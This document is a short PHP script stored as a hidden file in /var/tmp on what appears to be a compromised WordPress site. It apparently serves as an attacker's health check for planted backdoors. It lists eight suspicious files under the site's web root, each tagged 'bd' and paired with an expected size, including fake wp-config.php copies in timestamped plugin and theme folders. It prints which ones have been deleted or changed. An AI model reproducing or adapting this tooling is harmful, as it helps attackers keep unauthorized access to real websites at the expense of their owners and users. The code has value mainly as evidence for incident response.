File: //var/tmp/.created
<?php $r = '/home/ieeeos/ieeeottawa.ca'; $x = ["/W.php"=>"bd@@231937@@598",
"/wp-content/plugins/contact-1748013780/wp-config.php"=>"bd@@252690@@727",
"/00daed.php"=>"bd@@18973@@105",
"/wp-content/plugins/widget_1751117525/wp-config.php"=>"bd@@427569@@727",
"/wp-content/themes/archives-1748029090/wp-config.php"=>"bd@@266845@@727",
"/wp-content/themes/author-template-1747416352/connents.php"=>"bd@@1432@@1166",
"/wp-content/plugins/security-1747911658/paqe.php"=>"bd@@223919@@731",
"/wp-content/plugins/popup-maker/vendor-prefixed/code-atlantic/prerequisite-checks/src/screen_concept.php"=>"bd@@213732@@414"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');